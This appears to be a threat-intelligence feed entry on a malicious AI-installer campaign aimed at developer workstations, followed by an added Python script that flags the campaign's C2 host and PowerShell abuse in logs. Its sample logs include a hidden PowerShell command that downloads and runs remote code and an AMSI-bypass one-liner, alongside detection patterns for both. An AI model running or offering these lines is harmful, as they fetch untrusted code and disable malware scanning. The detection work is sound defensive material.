
Global Malicious AI Installer Campaign Targets Developer Workstations

ID: a2714339-3eb2-5e74-9e43-b1a82d6770f7

STIX ID: report--a2714339-3eb2-5e74-9e43-b1a82d6770f7

Feed Name: securityonline.info

Threat Score
75/100

Date Published: 2026-05-27

Date Updated: 2026-05-27

Author: Ddos

...
...

A sophisticated campaign targets software engineers through typosquatted, SEO-poisoned installer pages. Each page instructs the visitor to paste a PowerShell command that completes a legitimate CLI installation while, in the same run, loading a fileless infostealer into memory. Once resident, the malware disables AMSI and ETW, runs anti-sandbox checks, harvests credentials and session tokens from browsers and collaboration apps, and contacts its C2 endpoints (for example events.msft23.com, using the /take, /process and /validate paths) to receive RSA-encrypted tasking.
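The summary above gives a defender two places to look: outbound traffic to the C2 host and its task paths, and PowerShell script-block logs for a download cradle or AMSI/ETW tampering. The script below is an added example, not code from the original post or from the feed. It uses only the C2 host and paths stated in the summary; the two log formats (a proxy line and a script-block-log line), the sample log entries, and the cradle/AMSI heuristics are constructed for illustration. In particular, the page does not show the campaign's actual PowerShell command, so the cradle patterns are generic practitioner heuristics, not that command's signature.

```python
import re
from dataclasses import dataclass

# Indicators stated in the summary: C2 host and the tasking/telemetry paths.
C2_HOSTS = {"events.msft23.com"}
C2_PATHS = {"/take", "/process", "/validate"}

# Generic download-cradle heuristics (assumed, not the campaign's real command):
# in-memory execution, remote fetch, encoded or hidden invocation, policy bypass.
CRADLE_PATTERNS = [
    re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    re.compile(r"(?i)downloadstring|invoke-webrequest|\birm\b|\biwr\b"),
    re.compile(r"(?i)-enc(odedcommand)?\s+"),
    re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"),
]
# Strings that appear in common AMSI/ETW tampering one-liners (assumed heuristics).
AMSI_ETW_PATTERNS = [
    re.compile(r"(?i)amsiutils|amsiinitfailed|amsiscanbuffer"),
    re.compile(r"(?i)etweventwrite|System\.Diagnostics\.Eventing"),
]

@dataclass
class Finding:
    source: str   # "proxy" or "powershell"
    reason: str
    line: str

def check_proxy_line(line):
    # Constructed format: "PROXY <ts> <src_ip> <method> <url> <status>"
    parts = line.split()
    if len(parts) < 6 or parts[0] != "PROXY":
        return None
    m = re.match(r"https?://([^/]+)(/[^?\s]*)?", parts[4])
    if not m:
        return None
    host, path = m.group(1).lower(), (m.group(2) or "/")
    if host in C2_HOSTS:
        if path in C2_PATHS:
            return Finding("proxy", f"known C2 host and path {host}{path}", line)
        return Finding("proxy", f"known C2 host {host}", line)
    return None

def check_powershell_line(line):
    # Constructed format: "PSLOG <ts> <host> <user> ScriptBlock: <script text>"
    if not line.startswith("PSLOG") or "ScriptBlock:" not in line:
        return None
    text = line.split("ScriptBlock:", 1)[1]
    if any(p.search(text) for p in AMSI_ETW_PATTERNS):
        return Finding("powershell", "AMSI/ETW tampering strings", line)
    hits = sum(1 for p in CRADLE_PATTERNS if p.search(text))
    # Two or more cradle traits together is the threshold; a lone IEX is noisy.
    if hits >= 2:
        return Finding("powershell", f"download cradle ({hits} indicators)", line)
    return None

def scan(lines):
    """Run both checks over a list of log lines and return the findings in order."""
    findings = []
    for line in lines:
        f = check_proxy_line(line) or check_powershell_line(line)
        if f:
            findings.append(f)
    return findings

# Constructed sample logs: one benign and several suspicious entries of each kind.
SAMPLE_LOGS = [
    "PROXY 2026-05-27T10:00:41Z 10.0.4.12 GET https://github.com/cli/cli/releases 200",
    "PROXY 2026-05-27T10:01:03Z 10.0.4.12 POST https://events.msft23.com/validate 200",
    "PROXY 2026-05-27T10:01:09Z 10.0.4.12 GET https://events.msft23.com/process?id=7f3a 200",
    "PROXY 2026-05-27T10:02:00Z 10.0.4.12 GET https://cdn.example.net/take 200",
    "PSLOG 2026-05-27T10:00:50Z WS-DEV01 jdoe ScriptBlock: Get-ChildItem C:\\Users\\jdoe",
    "PSLOG 2026-05-27T10:00:58Z WS-DEV01 jdoe ScriptBlock: powershell -w hidden -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')\"",
    "PSLOG 2026-05-27T10:00:59Z WS-DEV01 jdoe ScriptBlock: [Ref].Assembly.GetType("
    "'System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')"
    ".SetValue($null,$true)",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.source}] {f.reason}: {f.line[:90]}")
```

On real data, replace SAMPLE_LOGS with lines read from the proxy and PowerShell script-block exports; the proxy check is exact-match on the stated host, so it will not fire on look-alike domains, while the PowerShell heuristics are deliberately broad and should be tuned against a baseline of legitimate installer one-liners in the environment.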
